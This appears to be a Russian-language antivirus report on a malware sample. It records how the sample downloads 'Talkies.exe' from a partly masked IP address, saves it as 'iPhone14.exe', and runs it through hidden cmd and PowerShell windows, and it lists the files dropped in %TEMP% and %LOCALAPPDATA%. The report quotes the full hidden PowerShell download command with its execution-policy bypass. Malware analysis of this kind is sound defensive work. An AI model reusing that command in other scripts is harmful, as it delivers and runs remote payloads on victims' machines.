Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://13.##5.42.231/talkies.exe как %appdata%\iphone14.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\iPhone14.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\drdtfhgygeghd{В .sct
- %APPDATA%\iphone14.exe
- %TEMP%\nsmf5e3.tmp
- %TEMP%\nsrf825.tmp\system.dll
- %LOCALAPPDATA%\plight\canonist\hastener\reliquidate.ink
- %LOCALAPPDATA%\plight\canonist\hastener\hmmapi.dll
- %LOCALAPPDATA%\plight\canonist\hastener\svampekost.myo
- %TEMP%\nsm19d7.tmp
- %TEMP%\nsx3055.tmp\system.dll
- %TEMP%\nsm34a7.tmp
- %TEMP%\nsc3776.tmp\system.dll
Удаляет следующие файлы
- %TEMP%\drdtfhgygeghd{В .sct
Сетевая активность
Подключается к
- '13.##5.42.231':80
TCP
Запросы HTTP GET
- http://13.##5.42.231/Talkies.exe
Другое
Создает и запускает на исполнение
- '%APPDATA%\iphone14.exe'
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\iPhone14.exe' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://13.##5.42.231/Talkies.exe','%APPDATA%\iPhone14.exe')' (со скрытым окном)
